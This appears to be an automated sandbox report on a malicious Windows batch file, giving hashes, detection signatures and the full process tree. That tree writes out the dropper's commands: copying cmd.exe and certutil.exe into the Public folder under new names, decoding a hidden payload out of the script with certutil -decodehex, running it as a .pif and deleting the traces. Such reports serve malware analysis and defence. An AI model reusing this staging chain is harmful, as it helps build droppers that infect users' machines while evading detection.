Overview

overview

10

Static

static

1

lNV-2024-3...79.cmd

windows7-x64

10

lNV-2024-3...79.cmd

windows10-2004-x64

7

Analysis

  • max time kernel
    144s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-06-2024 16:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    lNV-2024-3626276279.cmd

  • Size

    4.2MB

  • MD5

    55517abac6d9789ddcde10ce5ba82872

  • SHA1

    dba9aeaf67ee05ca8a38ba5ffdb75607b8a2288d

  • SHA256

    ecb54d88590475659fa26d0e65d0743d19e42441fe6311e38dec28026fc95945

  • SHA512

    b951dd6e870d77250af92f4f8920f57622fbd2e58c555abeb704993d51cd0b052cc7b2ec5f98c4d91011f76117bab6717aa25fa775adf899c32d2c5d26453207

  • SSDEEP

    49152:H0HI7tGDjsb7rA3kn2IU9svyG1qrN3Gbiu8HHKMi4F2652/0cN6g/BdKgJ:5

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 8 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lNV-2024-3626276279.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3156
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
        PID:3996
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2252
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:5084
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\lNV-2024-3626276279.cmd" "C:\\Users\\Public\\Audio.mp4" 9
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4840
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\lNV-2024-3626276279.cmd" "C:\\Users\\Public\\Audio.mp4" 9
            3⤵
            • Executes dropped EXE
            PID:1920
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1512
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
            3⤵
            • Executes dropped EXE
            PID:1776
        • C:\Users\Public\Libraries\Audio.pif
          C:\Users\Public\Libraries\Audio.pif
          2⤵
          • Executes dropped EXE
          PID:4388
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
          2⤵
          • Executes dropped EXE
          PID:3172
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S
          2⤵
          • Executes dropped EXE
          PID:1108

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Public\Audio.mp4
        Filesize

        3.0MB

        MD5

        8d6a6f7f28472f54780ace4be5e35f7f

        SHA1

        93e285f23ef6cb95d3be6c5c4ce3eddcdd0e4201

        SHA256

        611fbe02cb707477addb2b98bbb193d77f981a4fc61be39b74543f3f43fc5cd1

        SHA512

        87497486cc166f3c6c43dd05b9bc08c7947c97be03ea2a8edf962c59f3027cdccc1b57d99a55a072e26d7b83e678f67cedad1f54beaa7d3a352556db4fa78744

        Download Submit
      • C:\Users\Public\Libraries\Audio.pif
        Filesize

        1.5MB

        MD5

        3351922e54c2698b80f65bbe11894bb8

        SHA1

        6121c53dcb4f81a202e393281c53e95de2155219

        SHA256

        6ad37e5e8fc00d1bb6538d409e3930882ac8bc1e3efdda551ead49edfdba2c42

        SHA512

        d9ac69966e0ad0ff05fe137a08d0ba211c11dfe5303d032ff3fc337a5302cdab1bbfb9f7153567d8b11acff38c0c433d92dd48925f3bb7824cc572562014bfdc

        Download Submit
      • C:\Users\Public\alpha.exe
        Filesize

        283KB

        MD5

        8a2122e8162dbef04694b9c3e0b6cdee

        SHA1

        f1efb0fddc156e4c61c5f78a54700e4e7984d55d

        SHA256

        b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

        SHA512

        99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

        Download Submit
      • C:\Users\Public\kn.exe
        Filesize

        1.6MB

        MD5

        bd8d9943a9b1def98eb83e0fa48796c2

        SHA1

        70e89852f023ab7cde0173eda1208dbb580f1e4f

        SHA256

        8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

        SHA512

        95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

        Download Submit
      • memory/4388-28-0x0000000000400000-0x000000000058B000-memory.dmp
        Filesize

        1.5MB

        Download